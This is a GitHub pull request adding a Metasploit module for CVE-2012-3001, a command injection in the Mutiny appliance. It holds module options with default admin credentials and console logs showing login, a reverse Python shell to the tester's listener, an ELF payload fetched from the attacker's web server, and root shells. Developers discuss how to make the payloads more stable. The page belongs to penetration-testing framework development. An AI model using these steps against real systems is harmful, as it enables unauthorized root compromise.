Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

added module for cve-2012-3001 #1557

Merged
merged 3 commits into from Mar 22, 2013

Conversation

Projects
None yet
3 participants
@jvazquez-r7
Copy link
Contributor

commented Mar 7, 2013

Tested successfully with Mutiny 4.2-1.05 as distributed on the vendor page:

http://www.mutiny.com/support/downloads/Mutiny-Build-CD-4.2-1.05.iso

Notes:

  • The python payload is the more stable in this case, since others (perl and bash) are executed multiple times after injection, which is annoying. Since python is installed by default in the mutiny appliance sounds like a good option for me.
  • The exploitation modifies network parameters (mainly the netmask), because of this the exploit tries to leak the original parameters and restores the original network configuration after exploitation.

Test results:

msf  exploit(mutiny_subnetmask_exec) > show options

Module options (exploit/unix/webapp/mutiny_subnetmask_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   mutiny           yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.177    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /interface/      yes       The base path to Mutiny
   USERNAME   admin            yes       The user to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.128    yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
[+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.177:40294) at 2013-03-07 14:19:39 +0100
[*] 192.168.1.177:80 - Restoring Network information
[+] 192.168.1.177:80 - Network information restored

bash: no job control in this shell
[root@mutiny-unknown network-scripts]# 1901772573
vycrgtyayFoxCpkHpOhvWdHTBrhiyHQW
[root@mutiny-unknown network-scripts]# [root@mutiny-unknown network-scripts]# Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
AlAeyCxLgWGvROEByrhXlZpIUMuaacki
[root@mutiny-unknown network-scripts]# id
uid=0(root) gid=0(root)
[root@mutiny-unknown network-scripts]# uname -a
Linux mutiny-unknown 2.6.15-1.1833_FC4smp #1 SMP Wed Mar 1 23:56:51 EST 2006 i686 i686 i386 GNU/Linux
[root@mutiny-unknown network-scripts]# exit
exit

[*] 192.168.1.177 - Command shell session 2 closed.  Reason: Died from EOFError
^C
Abort session 2? [y/N]  y
msf  exploit(mutiny_subnetmask_exec) > 

jvazquez-r7
@L1ghtn1ng

This comment has been minimized.

Copy link
Contributor

commented Mar 7, 2013

@jvazquez-r7 to get the bash payload more stable and only run once. How about getting the exploit to drop a shell script to the system, then run that for the bash payload? then when the user quits out it automatically removes that file in the clean up just an idea for you to contemplate and to maybe make it more stable?

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor Author

commented Mar 7, 2013

Hi @L1ghtn1ng, Im glad to listen there is interest!! Still better I think, I'm going to work in a new target to execute linux payloads :) so staging from CMD to meterpreter or shell payloads will be possible :)

Please in case someone looks into it, dont merge atm, lemme add a new target and make linux payloads available to the user :)

Thanks!

juan

@L1ghtn1ng

This comment has been minimized.

Copy link
Contributor

commented Mar 7, 2013

On 07/03/13 14:53, Juan Vazquez wrote:

Hi @L1ghtn1ng, Im glad to listen there is interest!! Still better I think, I'm going to work in a new target to execute linux payloads :) so staging from CMD to meterpreter or shell payloads will be possible :)

Please in case someone looks into it, dont merge atm, lemme add a new target and make linux payloads available to the user :)

Thanks!

juan


Reply to this email directly or view it on GitHub:
#1557 (comment)

Fair enough was just an idea for you to see if that would help

jvazquez-r7 added some commits Mar 7, 2013

jvazquez-r7
jvazquez-r7
@jvazquez-r7

This comment has been minimized.

Copy link
Contributor Author

commented Mar 7, 2013

I've added a new linux native target, and set it as default target. My only concern is I cannot specify the compatible cmd payloads in the targets section. The console doesn't have into account and the user can select any available cmd payload.

  • Test with linux target:
msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
msf  exploit(mutiny_subnetmask_exec) > [+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] 192.168.1.177:80 - Generating the ELF Payload...
[*] 192.168.1.177:80 - Setting up the Web Service...
[*] 192.168.1.177:80 - Starting up our web service on http://192.168.1.128:8080/Gfquf.elf ...
[*] Using URL: http://0.0.0.0:8080/Gfquf.elf
[*]  Local IP: http://192.168.1.128:8080/Gfquf.elf
[+] 192.168.1.177:80 - Sending the ELF payload to the target...
[*] Sending stage (36 bytes) to 192.168.1.177
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.177:36513) at 2013-03-07 19:08:52 +0100
[*] 192.168.1.177:80 - Restoring Network Information and Cleanup...
[*] 192.168.1.177:80 - Waiting for the victim to request the ELF payload...
[*] 192.168.1.177:80 - Shutting down the web service...

msf  exploit(mutiny_subnetmask_exec) > sessions -i 2
[*] Starting interaction with 2...

2981886236
wcoXxgevxrIenaiWPWNJQRtFibUdWgFJ
Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
hDEzbrDyCJDtIFicHJDmjVVCANxGQBGA


id
uid=0(root) gid=0(root)
uname -a
Linux mutiny-unknown 2.6.15-1.1833_FC4smp #1 SMP Wed Mar 1 23:56:51 EST 2006 i686 i686 i386 GNU/Linux
^C
Abort session 2? [y/N]  y

  • Test with unix cmd target
msf  exploit(mutiny_subnetmask_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf  exploit(mutiny_subnetmask_exec) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(mutiny_subnetmask_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.177:80 - Login with the provided credentials...
msf  exploit(mutiny_subnetmask_exec) > [+] 192.168.1.177:80 - Login successful
[*] 192.168.1.177:80 - Leaking current Network Information...
[+] 192.168.1.177:80 - Information leaked successfully
[*] 192.168.1.177:80 - Exploiting Command Injection...
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.177:36515) at 2013-03-07 19:09:41 +0100
[*] 192.168.1.177:80 - Restoring Network Information and Cleanup...
msf  exploit(mutiny_subnetmask_exec) > 
msf  exploit(mutiny_subnetmask_exec) > sessions 

Active sessions
===============

  Id  Type    Information  Connection
  --  ----    -----------  ----------
  3   shell                192.168.1.128:4444 -> 192.168.1.177:36515 (192.168.1.177)

msf  exploit(mutiny_subnetmask_exec) > sessions -i 3
[*] Starting interaction with 3...

bash: no job control in this shell
[root@mutiny-unknown network-scripts]# 3055540342
csOhKyjJyBScBeodhzVgpQFVpDIRHIpr
[root@mutiny-unknown network-scripts]# [root@mutiny-unknown network-scripts]# Shutting down interface eth0:  [  OK  ]
Shutting down loopback interface:  [  OK  ]
Bringing up loopback interface:  [  OK  ]
Bringing up interface eth0:  [  OK  ]
Bringing up interface eth1:  Device eth1 does not seem to be present, delaying initialization.
[FAILED]
OVQLvTFPFTSVOWaqxTFXEjarJdLDooOJ
[root@mutiny-unknown network-scripts]# id
uid=0(root) gid=0(root)
[root@mutiny-unknown network-scripts]# ^C
Abort session 3? [y/N]  y


@L1ghtn1ng

This comment has been minimized.

Copy link
Contributor

commented Mar 11, 2013

Hey @jvazquez-r7 just wondering would implementing the features of this PR #1275 in to this module help? Thought it might be a good idea for you to take a look at ?

@wchen-r7 wchen-r7 merged commit 25db782 into rapid7:master Mar 22, 2013

1 check passed

default The Travis build passed
Details

@jvazquez-r7 jvazquez-r7 deleted the jvazquez-r7:mutiny_subnetmask_exec branch Nov 18, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.